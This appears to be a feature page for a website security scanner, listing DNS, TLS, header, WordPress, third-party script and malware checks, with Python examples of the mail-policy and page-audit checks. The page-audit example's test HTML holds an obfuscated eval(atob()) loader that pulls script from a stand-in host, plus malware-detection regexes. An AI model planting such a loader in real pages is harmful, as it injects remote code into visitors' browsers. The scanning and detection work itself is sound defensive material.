01
WHOIS & DNS
dig +dnssec ANY

We retrieve A, AAAA, MX, NS, CAA, and TXT records, then analyse SPF, DMARC, MTA-STS, TLS-RPT, and service fingerprints. Domain WHOIS data and Certificate Transparency logs are also included.

  • [medium] No SPF record — any server can send mail as your domain; publish v=spf1 ... -all
  • [low] No DMARC record — receivers get no policy for mail that fails SPF/DKIM alignment, so spoofed messages are harder to block and you receive no aggregate reports; publish a v=DMARC1 record at _dmarc.<domain>
  • [medium] Multiple SPF records — RFC 7208 permits exactly one v=spf1 record per name; duplicates produce a permerror and can cause delivery failures
  • [low] No CAA records — any publicly trusted certificate authority may issue certificates for your domain; CAA (RFC 8659) restricts issuance to the CAs you list
  • [low] No MTA-STS record — MTAs delivering to your MX hosts can be downgraded to plaintext or misdirected to an attacker's server (only flagged if MX records exist)
  • [low] No TLS-RPT record — no reports on SMTP TLS delivery failures (RFC 8460)
  • [low] Certificate Transparency — enumerates every subdomain that has ever been issued a public TLS certificate, via crt.sh; surfaces forgotten staging and admin hosts
  • [ok] Service detection — identifies email providers, CDNs, and SaaS tools from DNS records
  • [ok] WHOIS — registrar, creation date, expiry date, and domain status flags
  • [ok] DNS lookup buttons — find other websites on the same IP, MX, or NS via dnsarchive.net
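The SPF, DMARC, CAA, MTA-STS and TLS-RPT checks listed above, as an added Python example that is not the scanner's own code. The record set is constructed inline so the checks run offline; a real run would fetch the TXT, MX and CAA records with dnspython or dig. It goes one step beyond the list by also flagging a single SPF record that ends in +all or has no all mechanism, which is an assumption about what a sensible check should do rather than something the page states.

```python
import re

# Constructed sample record set (not real DNS data): MX present, two SPF
# records, and no DMARC, MTA-STS, TLS-RPT or CAA records.
SAMPLE_RECORDS = {
    "example.test": {
        "TXT": ['"v=spf1 include:_spf.mail.test ~all"',
                '"v=spf1 ip4:192.0.2.10 -all"'],
        "MX": ["10 mx1.mail.test."],
        "CAA": [],
    },
    "_dmarc.example.test": {"TXT": []},
    "_mta-sts.example.test": {"TXT": []},
    "_smtp._tls.example.test": {"TXT": []},
}


def txt_records(records, name):
    """TXT strings at `name` with the surrounding quotes removed."""
    return [s.strip('"') for s in records.get(name, {}).get("TXT", [])]


def check_email_policy(records, domain):
    """Return (severity, message) findings for the domain's mail and CA policy records."""
    findings = []
    base = records.get(domain, {})

    spf = [t for t in txt_records(records, domain) if t.lower().startswith("v=spf1")]
    if not spf:
        findings.append(("medium", "No SPF record"))
    elif len(spf) > 1:
        # RFC 7208 section 3.2: more than one v=spf1 record is a permerror.
        findings.append(("medium", "Multiple SPF records"))
    else:
        # Assumed extra check: the rightmost "all" qualifier decides what happens
        # to senders no mechanism matched; "+all" authorises everyone.
        rec = spf[0].lower()
        m = re.search(r"(?:^|\s)([-~+?]?)all(?:\s|$)", rec)
        if m is not None and m.group(1) == "+":
            findings.append(("medium", "SPF ends in +all"))
        elif m is None and "redirect=" not in rec:
            findings.append(("medium", "SPF has no all mechanism"))

    if not any(t.upper().startswith("V=DMARC1")
               for t in txt_records(records, "_dmarc." + domain)):
        findings.append(("low", "No DMARC record"))

    # RFC 8659 lets a CA climb to parent labels when a name has no CAA set;
    # this example only inspects the domain itself.
    if not base.get("CAA"):
        findings.append(("low", "No CAA records"))

    # MTA-STS and TLS-RPT only matter for domains that actually receive mail.
    if base.get("MX"):
        if not any(t.startswith("v=STSv1")
                   for t in txt_records(records, "_mta-sts." + domain)):
            findings.append(("low", "No MTA-STS record"))
        if not any(t.startswith("v=TLSRPTv1")
                   for t in txt_records(records, "_smtp._tls." + domain)):
            findings.append(("low", "No TLS-RPT record"))
    return findings


if __name__ == "__main__":
    for severity, message in check_email_policy(SAMPLE_RECORDS, "example.test"):
        print(f"[{severity}] {message}")
```

Against the constructed record set this reports the duplicate SPF plus the four missing policy records; a domain with no MX is not nagged about MTA-STS or TLS-RPT.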
02
SSL / TLS Certificate
openssl s_client

SSL/TLS encrypts traffic between the browser and server. We validate the certificate chain, expiry, and protocol version, then trace the HTTP→HTTPS redirect chain and check the HSTS preload list.

  • [critical] Expired certificate — browsers show a full-page warning and block the site for all visitors
  • [high] Expiring within 14 days — renew immediately to avoid an outage and loss of visitor trust
  • [low] TLS 1.2 — still secure when configured with ECDHE and AEAD cipher suites, but TLS 1.3 mandates forward secrecy, drops the legacy ciphers, and completes the handshake in one round trip
  • [high] TLS 1.0 / 1.1 — deprecated by RFC 8996; TLS 1.0 CBC suites are exposed to BEAST, neither version offers AEAD ciphers, and current browsers refuse to connect
  • [high] HTTP not redirecting to HTTPS — the site is served over plain HTTP, so an on-path attacker can read or modify every page
  • [low] Long redirect chain — more than 3 hops slows the first visit; collapse to a single redirect
  • [low] Not on HSTS preload list — without preloading the very first visit can be intercepted and downgraded before the browser has ever seen the HSTS header (queried via hstspreload.org)
03
CMS Detection
probe --cms

We fingerprint the CMS by inspecting HTML source, HTTP headers, and URL patterns. When WordPress is detected we run additional security probes.

  • [ok] Plugin detection — enumerated from HTML source references to /wp-content/plugins/
  • [medium] XML-RPC exposed — system.multicall packs hundreds of login attempts into a single request, and pingback.ping can be abused for reflected DDoS; disable XML-RPC if nothing depends on it
  • [low] Default login path — /wp-login.php is publicly reachable; rate-limit it, require MFA, or restrict it to an allowlist
  • [medium] User enumeration — queries the WordPress REST API at /wp-json/wp/v2/users and lists every exposed account (id, display name, slug); slugs are usually login names, which feeds password spraying
04
Security Headers
curl -sI
// header severity (when missing)
Header                       Severity
Content-Security-Policy      critical
X-Content-Type-Options       high
X-Frame-Options              high
Strict-Transport-Security    medium
Referrer-Policy              medium
Permissions-Policy           medium
Cross-Origin-Opener-Policy   low
// what each protects against
  • [critical] CSP — missing means nothing restricts where scripts may load from, so an injected script runs and can exfiltrate page data
  • [high] X-Content-Type-Options — missing lets browsers sniff content types and execute a misidentified upload as script; set nosniff
  • [high] X-Frame-Options — missing allows clickjacking via iframe embedding (CSP frame-ancestors is the modern equivalent)
  • [medium] HSTS — missing means later visits can still begin over plain HTTP and be intercepted before the redirect
  • [medium] CSP quality — flags 'unsafe-inline', 'unsafe-eval', wildcard sources, and missing frame-ancestors / object-src / base-uri
  • [high] Mixed content — http:// resources loaded on an HTTPS page; browsers block active mixed content (scripts, iframes) and upgrade or block the rest, so functionality breaks and the TLS guarantee no longer covers the whole page
  • [low] security.txt — checks /.well-known/security.txt (RFC 9116) so researchers can find a vulnerability contact
05
Raw HTTP Headers
curl -sI --raw
// WAF & CDN detection
Provider          Signature headers
Cloudflare        cf-ray, cf-cache-status, server: cloudflare
AWS CloudFront    server: CloudFront, x-amz-cf-id, x-amzn-waf-action
Sucuri            x-sucuri-id, x-sucuri-cache, server: sucuri
Akamai            server header contains "Akamai"
// additional detections
  • [ok] Hosting provider — Kinsta, WP Engine, Hostinger detected via response headers
  • [ok] HTTP version — HTTP/3 and HTTP/2 flagged as positive; HTTP/1.1 flagged as a warning
  • [ok] Compression — Brotli and GZIP detection from the Content-Encoding header
  • [medium] Server version exposed — e.g. Apache/2.4.51; lets attackers match the exact build against known CVEs (Apache: ServerTokens Prod; nginx: server_tokens off)
  • [critical] PHP version exposed — X-Powered-By leaks the PHP version; set expose_php = Off in php.ini
  • [medium] Cookie security audit — checks every Set-Cookie for the Secure, HttpOnly and SameSite attributes and flags any cookie missing one
06
External JS Audit
parse --scripts

We parse all <script src> tags and identify scripts loaded from external domains. Third-party JS runs with full access to the page's DOM and user input, so a compromised CDN or ad network can silently exfiltrate credentials.

  • [medium] More than 10 external scripts — high third-party exposure; every extra domain is another party whose compromise becomes yours
  • [high] More than 20 external scripts — critical third-party exposure; audit and prune them
  • [ok] Script breakdown — grouped by domain with direct links to each file for inspection
  • [ok] Static vs dynamic — differentiates hardcoded script tags from dynamically injected ones
  • [medium] Subresource Integrity (SRI) — flags external scripts without an integrity= hash (and the matching crossorigin attribute); without SRI a CDN compromise silently injects code into your site. SRI only works for pinned, versioned files, not for "latest" URLs whose content changes
07
Malware & Blocklists
blocklist --check

We scan the page HTML for known malware signatures and check the domain against major security blocklists.

  • [critical] Google Safe Browsing — a listing here means Chrome and Firefox show a full-page warning to every visitor worldwide
  • [critical] VirusTotal — aggregates 70+ antivirus engines and URL scanners; flagged if any engine reports the domain
  • [high] Malware patterns — obfuscated scripts, base64-encoded payloads, eval() injection
  • [high] Bad domain references — links to known malicious domains in the page source
  • [high] SEO spam patterns — hidden links and cloaked content injected by attackers
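The External JS Audit and the page-content half of Malware & Blocklists share one parse of the HTML, so both are shown in a single added Python example that is not the scanner's own code. The page, the blocklist and the malware regexes are all constructed for the example; the real checks consult live blocklists and larger signature sets.

```python
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed blocklist for the example (not a real feed).
BAD_DOMAINS = {"malware-sink.test"}

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.IGNORECASE)

# Illustrative "malware pattern" signatures: name -> regex over inline script bodies.
MALWARE_PATTERNS = {
    "eval of decoded string": re.compile(r"eval\s*\(\s*(?:atob|unescape|String\.fromCharCode)", re.IGNORECASE),
    "long base64 blob": re.compile(r"[A-Za-z0-9+/]{80,}={0,2}"),
    "hex-escaped string": re.compile(r"(?:\\x[0-9a-f]{2}){8,}", re.IGNORECASE),
}

# Constructed page (not a real site): an SRI-protected CDN script, a tracker without
# SRI, a first-party script, an eval(atob()) loader, a hidden SEO link and a link
# to a blocklisted domain.
_PAYLOAD = base64.b64encode(
    b"document.write('<script src=https://evil.example.test/x.js></script>');").decode()
SAMPLE_HTML = f"""<html><head>
<script src="https://cdn.example.test/lib.js" integrity="sha384-AAAA" crossorigin="anonymous"></script>
<script src="https://ads.tracker.test/pixel.js"></script>
<script src="/static/app.js"></script>
<script>var p = "{_PAYLOAD}"; eval(atob(p));</script>
</head><body>
<div style="display:none"><a href="https://cheap-pills.test/buy">buy now</a></div>
<a href="https://malware-sink.test/x">download</a>
</body></html>"""


class PageCollector(HTMLParser):
    """Collect script sources, inline script bodies, hidden links and referenced hosts."""

    def __init__(self):
        super().__init__()
        self.scripts, self.inline, self.hidden_links, self.hosts = [], [], [], set()
        self._stack, self._in_inline_script = [], False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        self._stack.append((tag, bool(HIDDEN_STYLE.search(a.get("style") or ""))))
        for attr in ("src", "href"):
            if a.get(attr):
                self.hosts.add(urlparse(a[attr]).netloc.lower())
        if tag == "script":
            if a.get("src"):
                self.scripts.append((a["src"], "integrity" in a))
            else:
                self._in_inline_script = True
        elif tag == "a" and a.get("href") and any(hidden for _, hidden in self._stack):
            self.hidden_links.append(a["href"])      # link inside a display:none ancestor

    def handle_data(self, data):
        if self._in_inline_script:
            self.inline.append(data)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_inline_script = False
        while self._stack:                           # pop through unclosed void elements
            if self._stack.pop()[0] == tag:
                break


def audit_page(html, page_host, bad_domains=BAD_DOMAINS):
    """External JS Audit plus the page-content Malware & Blocklists checks for one page."""
    page = PageCollector()
    page.feed(html)
    findings = []

    external = [(src, sri) for src, sri in page.scripts
                if urlparse(src).netloc and urlparse(src).netloc.lower() != page_host]
    if len(external) > 20:
        findings.append(("high", f"More than 20 external scripts ({len(external)})"))
    elif len(external) > 10:
        findings.append(("medium", f"More than 10 external scripts ({len(external)})"))
    findings += [("medium", f"No SRI on {src}") for src, sri in external if not sri]

    body = "\n".join(page.inline)
    findings += [("high", f"Malware pattern: {name}")
                 for name, pattern in MALWARE_PATTERNS.items() if pattern.search(body)]
    findings += [("high", f"Link to known bad domain {host}") for host in sorted(page.hosts & bad_domains)]
    findings += [("high", f"Hidden link: {href}") for href in page.hidden_links]
    return findings


if __name__ == "__main__":
    for severity, message in audit_page(SAMPLE_HTML, "www.example.test"):
        print(f"[{severity}] {message}")
```

Only scripts whose host differs from the page host count as external, so relative and same-origin scripts are neither counted toward the thresholds nor flagged for SRI; scripts inserted at runtime by other scripts (the "dynamic" case) are invisible to a static parse and need a headless browser.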